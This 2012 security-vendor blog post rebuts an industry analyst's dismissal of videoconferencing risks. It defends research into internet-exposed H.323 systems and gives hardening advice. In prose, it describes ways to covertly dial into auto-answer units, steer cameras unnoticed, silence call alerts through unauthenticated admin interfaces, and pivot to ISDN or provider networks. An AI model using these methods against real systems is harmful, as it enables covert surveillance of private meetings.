hdmoore

Mythical Videoconferencing Hackers

Blog Post created by hdmoore on Jan 25, 2012

Open and frank debate is one of the great things about the security community and the recent press about our H.323 research has set off a firestorm in some circles. In one extensively written post, David Maldow of Human Productivity Lab downplays the risk to video conferencing systems and makes a few claims about the security of these systems that were hard to ignore. David's statements in "quotes" and our responses in bold:

 


 

Introduction

 

 

"I've read good things about Rapid7 and always support efforts for security, but in fairness it should be noted that projecting an atmosphere of security risk in videoconferencing is clearly in their interest."

 

 

Unfortunately, everyone has a bias - if we did not care about proactive security testing, this research would have never occurred. Rapid7 takes an empirical approach to security research, focusing on understanding the true situation regarding how systems are actually deployed in real life. For this specific research, we spent a lot of time on quantifying the data from the research and speaking with industry experts in the video conferencing space (which we do not consider ourselves to be).  Rapid7 focuses on providing products, tools, and information about security risks that allow our customers and open source users to make informed decisions. Calling attention to an issue that has historically been ignored and providing the tools to test it is what we do.

 

 

We often find situations where large numbers of systems are deployed in surprisingly insecure ways, where everyone including us would have expected that "no one would do it this way". This mismatch between expectations and reality is a major source of real world security problems. For example, I never would have expected that a very widely deployed embedded operating system like VxWorks would ship with the debugger attached and open to connections by default – and any industry expert you'd ask would similarly say "no sane person would deploy it that way".  Similarly, much of David's comments are along the lines of "no one would do it that way". The facts, unfortunately, again prove otherwise.

 

 

 

 

Videoconferencing Hackers

 

 

"The article's title claims that the boardroom will be opened up to "Hackers." However, from the rest of the article it was clear that there was no real hacking involved. Videoconferencing signals use AES encryption. This isn't a new or rare development. AES has been standard on almost all major endpoints (at all price ranges) for a long time. The use of AES means that even if videoconferencing data signals are intercepted as they traverse the internet, the encryption would have to be hacked before anyone could watch the video or listen to the audio. No one is suggesting that this type of hacking is occurring. Rather than hacking into the boardrooms, Rapid7 was simply calling them. These systems apparently answered some of their calls, as they were designed to do."

 

 

Encryption rarely has anything to do with security and hacking doesn't need to be high-tech, only effective, to be worth defending against. The issue with auto-answer is one piece of a larger problem with video conferencing deployments, but it was the issue that the NYT article focused on, due to the ease of exploitation and the visible result. In our January 24th webcast, the scope was expanded to discuss pivoting through administrative interfaces, exploiting software vulnerabilities in LifeSize equipment, and demonstrating the lack of security controls in many video conferencing systems. Given Polycom's stance of enabling auto-answer by default and the supporting data from our scans, even the auto-answer issue was worth addressing on its own.

 

 

"Rapid7 did create a program to scan the internet for videoconferencing systems. From this they were able to get a list of IP addresses, which are like phone numbers for VC systems. However, they had no idea where these systems were located and who they belonged to. It was a phone book with no names, only numbers. Not a great tool for an effective targeted hacking attack"

 

 

The details of the tool were not abundantly clear in the NYT article (the length wouldn't allow for it), but the scanning module we used was developed in-house and actually initiates a H.323 call to each scanned system. This module is open source and you can find it online at GitHub. The protocol handshake returns a number of useful bits of data, including the Vendor ID, Version ID, Product ID, and DisplayName.


 

The DisplayName usually describes either the location or purpose of a specific endpoint. Approximately half of the results from the scan included the DisplayName element. I have changed some of the names to prevent obvious identification, but you can see that between the product information, the DisplayName, and the attributes of the IP address (DNS and Whois), identifying the owner of a particular endpoint is trivial.


 

         IP: AAA.BBB.CCC.DDD:1720 Protocol: 5

   VendorID: 0xb500a11a VersionID: 4.5.6.2 ProductID: LifeSize Express

DisplayName: 36th Floor Board Room

        DNS: AAAAAA.dsl.chcgil.sbcglobal.net

      Whois: <CENSORED> ADVISORS-013223144143 ( IP range )


 

In this example, we identified the physical location, company name, ISP, and enough information about the product itself to know that the LifeSize exploit module included with the Metasploit products could be used to gain remote access to the system (Linux) shell.


 

If you look at just the DisplayNames, these are often more than enough to precisely identify the organization and location. These names include things like "Something Media", "BigCorp Moscow Polycom 2", and in some cases "<County> Courthouse". In the interest of not subjecting any specific entity to embarrassment or directed attacks, we have avoided publishing any detailed lists of results.

 

 

"With this list in hand, they started random dialing and peeked around some empty rooms. It should be noted that this list only included systems that were not deployed behind firewalls. "

 

 

To determine whether these systems were behind a firewall, we used the Nmap scanner to look for systems that had a large number of filtered ports. In most cases, these devices were deployed outside of the firewall, with the administrative interfaces exposed to the world. This may not be the recommended mode, but it is certainly prevalent in the wild. Even in cases where firewalls were in place, the H.323/1720 listener was still forwarded through and allowing for incoming calls. This is one of the problems with H.323 as a protocol - it is difficult to use through NAT, requires a large number of ports, and any PtP call requires the recipient to expose their system to the internet at large, using source IP ACLs or other product-specific tools to limit access.


 

By and large many organizations are ignoring the hassle and dumping the system online outside of the firewall or through a 1-to-1 NAT configuration. An industry expert pointed out one reason for so many endpoints configured to auto-answer from the internet - many MCUs are used in an outbound dial mode to start meetings and auto-answer is the most convenient way for the participates to join the call.

 

 

"Any environment with real security requirements will have their VC systems behind firewalls."

 

 

The most surprising thing about the research was how well-heeled and quite sensitive organizations were doing little to nothing to restrict access to their VC equipment. Anyone who spends the time locking down their VC systems can do an adequate job of protecting from the external attacks - it’s simply that many do not and that the overall awareness is not there today.

 

 

 

"Real hackers are scary. If someone does find a way to isolate VC traffic over the internet and hack encrypted VC signals from specific locations, I will be the first to raise the alarm. But I simply don't see a massive threat in the fact that it is possible to get lucky and randomly dial into an anonymous empty meeting room."

 

 

Real hackers are opportunists in every sense of the word. Encryption is not equivalent to authentication and often a silly software bug (such as the command execution flaw in the LifeSize web service) is all that’s needed to tear down any other defenses. The H.323 protocol provides enough information that an attacker can quickly map a network range associated with their target, identify any VC equipment, and leverage both weak default settings (auto-answer), default passwords, and software vulnerabilities to gain access to the audio/video stream, if not the internal network itself.

 

 

 

 

Flaws in Videoconferencing Systems

 

 

"In the next section I will explain why it is not easy to stealthily dial into a meeting room while in use."

 

 

Without debating each of David's points, we did prove that most VC equipment provided little or no warning when an attacker dialed into the system. In most cases, the television set is off unless a call is expected. If the television is off, there is little indication that a call is in progress. The reason for this is two-fold;

 

 

First - the base unit, not the camera, is usually what has an indicator that turns on when a call is in progress. The base units are often stashed behind a cabinet, near the floor, or generally out of sight.

 

 

Second - newer cameras (specifically, the Polycom HDX series) are extremely quiet while being panned or zoomed and the only indication they provide is the direction they are facing. We conducted a "blind" test where the conference room VC unit was accessed during a Rapid7 general staff meeting. Twenty minutes into the meeting, nobody had noticed the camera swinging from the rest position to pointing at a participant's laptop screen, zoomed in to capture his email and keystrokes.

 

 

"I think it is acceptable for low security rooms to have glass walls and video systems set to auto answer."

 

 

The expected security of a room depends on the company and the specific meeting being conducted within it. David mentioned that in some conference rooms, the walls were glass and there really was no visual protection of documents left on the table. However, it is very common that sensitive information (term sheets, passwords, personnel documents, etc.) are often being left out in the open.

 

 

A much more significant risk is the audio pickup - in many cases, the security of the VC system was literally a post-it note or other visual obstruction in front of the camera lens. This has no effect on the audio pickup. Testing similar equipment in our lab, we found that conversations could be clearly heard down the hall from where the VC unit was installed. David does make a point about a common configuration of  incoming calls starting off muted, but this is not always the case.

 

 

"If a meeting room requires security, you are as unlikely to find an unprotected videoconferencing system as you are to find an unprotected desktop computer."

 

 

Folks who spend a lot of time conducting security assessments can testify that unprotected desktops are not unheard of on external subnets. It’s a poor security policy, just like leaving a VC unit exposed to the internet, but it still happens and even large organizations that should know better make this mistake.  The issue with VC systems may be more dangerous as these systems are directly on the internet and by their nature in very sensitive locations.

 

 

"IT admins for sensitive environments are generally knowledgeable about firewalls and internet security. They are not likely to allow any IP devices to exist outside the firewall under their watch"

 

 

This is a really interesting point. IT admins often have little knowledge or experience with video conferencing unit security. An informal survey across enterprise customers using VC systems indicated that many of these were set to auto-answer, IT was not managing security patches, and often they were left exposed to the internet and sometimes with default passwords. All of these responses reinforced the results of the scan we performed.

 

 

"Rapid7 suggests a significant number of systems in otherwise secure environments are being deployed outside the firewall. This was disputed in the article by Ira M. Weinstein, senior analyst at Wainhouse Research, who stated that, "The companies that really have to worry about breaches -- the Department of Defense, banks -- put their systems behind the firewall." Mr. Weinstein's words carry some weight, considering his years covering this industry."

 

 

This was a point of debate. With all due respect to Mr. Weinstein's experience, he did not scan the internet and actually validate his assumptions. Even systems with some form of firewall in place were not provided much protection, since the devices were still configured to automatically accept incoming calls.

 

 

"Unlike a small company with one system in their one meeting room, Goldman Sachs likely is using a managed service provider to ensure that all of their systems are properly, and securely, provisioned."

 

 

We do not want to mention specific examples, but "Goldman Sachs" stood out because even though we didn't identify any of their systems in the internet survey, an organization they likely work with had access to a private link to their system. Since this organization exposed the administrative interface of their VC system and the system did not require any form of authentication to access it, the device could be used to bridge a call between an internet-facing attacker and a system on a private link such as the one labeled "Goldman Sachs". We have no proof that this system actually belonged to Goldman Sachs or that the call would have worked, but we did simulate the attack using like equipment in the lab.

 

 

Managed service providers are another area where this research took an unexpected turn. These providers typically use leased lines, VPNs, or other forms of private connectivity to bridge video services between sites. We found that many of the internet-exposed VC units also had access to the managed service provider network and internal resources. This was verified by looking at the unprotected web and telnet interfaces of units found with this configuration (again, we didn't guess passwords or attempt to bypass any existing security). Depending on how these service provider networks are configured, a single exposed customer could provide a foothold into the managed services network.

 

 

The same type of proxy attack works between IP and ISDN endpoints. An attacker accessing the administrative interface of an endpoint through the IP address can force the system to make an outbound call to an ISDN line. If the target of this proxy attack allows incoming calls from this device (often the case for systems frequently dialed in the system address book), the call will be accepted and the attacker now has snapshot access, if not much more, to the ISDN-connected target.

 

 

"The NYT seems to be simply unaware of the fact that the videoconferencing industry has had skin in the security game since its inception."

 

 

This comment refers to a statement about the lack of security built-in to video conferencing systems. I strongly disagree that security was a foremost concern for devices made between 3 and 7 years ago. The web and telnet service of the Polycom ViewStation systems from 2005 require no authentication to access. The vendors may have supported encryption since the beginning of IP video conferencing, but encryption only matters if you are protecting the data in transit, not protecting the endpoint itself from a directed attack.

 

 

Video conferencing equipment is actually pretty far behind the curve when it comes to network devices and resistance to attack. Even some consumer printers ship with a more secure administrative interface than what many vendors in the video-conferencing space provide today.

 

 

"In addition, the systems are often installed by experts with security as a priority. In a blog on this subject, IMCCA Director David Danto describes such an installation."

 

 

This varies widely by the organization, their awareness of security issues, and their choice of installer. As a generality, this doesn't appear to be true based on the results of our research. We do not disagree that a trained, security-conscious video conferencing expert can deliver a secure solution.

 

 

 

Semantics Aside - Is There A Security Risk?

 

 

"How easy is it to use a boardroom videoconferencing system to spy on a meeting? The answer is that it may be possible, but it wouldn't be very easy...Having spent countless hours testing videoconferencing systems and videonetwork infrastructure, with up to 18 videoconferencing systems set to auto answer at one time, I can assure you that it is not a silent process."

 

 

During the course of our in-house testing, using Polycom's ViewStation and HDX units, as well as an old D-Link, the results were mixed. However, we found that many of the high-end systems did not provide any easily visible notification that a call had been answered. The D-Link, however, got so annoying that we actually disassembled it and yanked the speaker out to continue the testing process.

 

 

"In addition, videoconferencing systems tend to be connected to rather large monitors. When called, the monitors will often "wake up" and display the system's logo if there is no incoming video."

 

 

Many organizations simply turn off the monitors/televisions when the device is not in use. The swing, as mentioned in a previous paragraph, is quiet with newer equipment and fairly hard to notice, especially in a busy meeting. Keep in mind that an attacker can take use a previously-acquired screenshot or a blank screen as their video source for what is displayed on the monitor.

 

 

"Videoconferencing systems weren't made with stealthy activation as a goal. They are communications devices, and they were very specifically designed to do a good job of alerting users to incoming calls."

 

 

Systems that expose the administrative interface provided two options for bypassing an incoming call alert. The first was simply to turn off the ringer to prevent any audible result from the unit itself. The second involved initiating an outbound call from the unit back to the attacker, which in some cases avoided the standard notifications. Either way, if the system is configured to make a lot of noise and the administrative interface is protected, an incoming call is going to be noticeable most of the time.

 

 

"(12 IFs truncated for brevity)... With that many "ifs" I think this may not be the top security concern for today's videoconferencing users. At this point VC spying is starting to look like Mission Impossible."

 

 

Regardless, it works, and if the VC monitor is not turned on (common, as stated above), there is usually little indicating that a call is active. We did try to replicate scenarios seen "in the wild" within our lab before making any claim and determine what the configuration must have been for the result to match. Keep in mind that most of the high-end room cameras can be controlled remotely and often you can point the camera back at the monitor to determine if it is indeed on.

 

 

"But, if you are leaving sensitive documents lying around meeting rooms, then videoconferencing is the least of your security concerns."


This generalizes physical security to a degree that is not realistic. For firms that are fairly small and manage sensitive or valuable information, it is fairly common for documents to be left in plain view within the office. Examples include law firms, small investment banking shops, and medical offices. On the other extreme, where large organizations have extremely rigid physical security, documents left sitting around a secured area may be considered safe. It would be unfair to classify either practice as insecure if it wasn't for the video conferencing unit being within zoom distance.

 

 

 

Securing Your Video Environment


 

David goes on to mention some basic security tips for video conferencing equipment. To this list, we would like to add keeping up to date on vendor patches, especially those that are security related, and requiring passcodes for access to both meeting rooms and endpoints. Polycom has a hardening guide that goes into more detail.

 

 

There is one conclusion that we still adamantly disagree with:

 

 

"Auto Answer - I have no problem with leaving auto answer enabled. However, most systems have an option to answer with audio muted. This is how I set up my systems. If I do get an unexpected call in the middle of a private conversation, the caller will not hear anything. If the NYT article made your co-workers nervous you can just turn off auto answer until everyone relaxes, but auto answer with audio muted is a perfectly acceptable secure setting."

 

 

David suggests that even with all of the known risks - that auto-answer should continue to be the standard. Fortunately, nearly every mainstream vendor with the exception of Polycom sees this differently. We still strongly recommended disabling auto-answer - the extra two seconds it takes to press the answer button on the remote provides the second-most important security measure available (the first being adequate protection of the administrative interface, which can be used to turn auto-answer back on).

 

 


Conclusion

 

 

"Even if a system is deployed outside of a firewall, it still isn't at serious risk of being hacked. It is at risk of accepting calls (which is what it was designed to do). A few common sense precautions can eliminate the risk of your system being in a call without you knowing about it."

 

 

This statement is absolutely untrue and may put users who follow this advice at risk. The H.323 video stream is only one service exposed by video conferencing systems, other services, such as telnet, web, ftp, snmp, and so on all expose the device to intrusion, using both weak credentials or exploits written specifically for that device. There is no justifiable reason to place a video conferencing system outside of firewall if at all possible and auto-answer should continue to be disabled, to prevent unexpected access to video or audio information.

 

 

"If the technology is secure enough for the Pentagon, it is secure enough for your boardroom."

 

 

The Pentagon follows vendor-specific hardening procedures to make systems far more secure, and almost undoubtedly does not deploy outside the firewall. Many videoconferencing systems vendors also sell Federal-specific versions with both hardware and software modifications that enhance security. This statement is about the same as saying "the pentagon uses computers, so if they're safe enough for them they're safe enough for you".

 

 

Software vulnerabilities are rampant (Metasploit alone exploits close to 750 of them, while Nexpose has close to 60,000 checks for known defects). Hardware appliances and network devices are even more problematic, as they tend to be difficult to update and run on proprietary software interfaces, often riddled with low-hanging security flaws. Who uses a piece of equipment is never a good test for how secure it is. Some of the most insecure equipment is still FIPS-140 certified.

 

 

 

 

Closing


 

We would like to thank David for summarizing his concerns with how the NYT article position videoconferencing security. At the end of the day, we stick by our position that videoconferencing systems are often deployed in an insecure manner and that the risk of unauthorized access is not something that many IT administrators or company executives are aware of today. We view the issue from the lens of vulnerability management, which is quite a different from that of an industry expert. Please leave a comment or open a discussion if you have any questions or would like further elaboration on a particular area.

Outcomes